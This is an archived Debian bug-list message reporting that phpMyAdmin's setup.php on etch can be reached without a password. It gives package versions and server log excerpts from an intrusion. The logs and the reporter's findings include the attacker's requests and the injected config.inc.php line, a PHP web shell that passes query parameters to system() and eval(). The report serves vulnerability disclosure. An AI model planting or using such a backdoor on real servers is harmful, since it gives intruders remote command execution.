Bug#543460: phpmyadmin: No password protection for setup.php script

Fri, 28 Aug 2009 01:44:03 -0700 

Il Tuesday 25 August 2009 22:55:45 hai scritto:

> I am unclear on how this would work. You say you are using the etch
> version. It asks for setup.php credentials and then installs the relevant
> Apache configuration to fence the setup.php off. This process works for
> me.
> Can you please detail what it is that causes the lack of authentication?
> Can you reproduce this on a clean install or after a package purge?

I installed a fresh etch debian and the phpmyadmin+php5+apache+mysql packages.
This is the result:

1) The phpmyadmin package installation doesn't ask for credentials

2) You can access the script http://{host}/phpmyadmin/scripts/setup.php
without entering a password

Package versions:

apache2: 2.2.3-4+etch10
phpmyadmin: 2.9.1.1-11
php5: 5.2.0+dfsg-8+etch15
mysql5: 5.0.32-7etch10

> Also even if you would be able to access setup.php, how would the code
> execution work exactly? Please provide an example.

I'm trying to figure out how this can be done, because the configuration is 
not writeable (both save and load buttons are disabled).

Looking into the logs I discover that the attacker looks for these files:

/phpmyadmin/scripts/setup.php
/phpmyadmin/js/keyhandler.js

And after he gets 200 return code he perform a POST request:

POST /phpmyadmin/scripts/setup.php HTTP/1.1" 200 
22713 "http://195.137.153.36/phpmyadmin/"; "Mozilla/5.0 (Windows; U; Windows 
NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 
3.5.30729)"

This is the next request (The content of base64_decode is 0x1337):

[17/Jul/2009:19:32:12 
+0200] "GET /phpmyadmin/config/config.inc.php?p=echo%20base64_decode(MHgxMzM3); 
HTTP/1.1" 200 17 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; 
rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"

The result is that /var/lib/phpmyadmin/config.inc.php contains:

$cfg['Servers'][$i]['host']=''; if($_GET['c'])
{echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p'])
{echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';

Consider that I (of course) have root password for mysql and there's not a 
password brute-force attack to phpmyadmin in the logs...

Cheers,
-- 
Michele Bonera
www.mexicolindo.info



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Reply via email to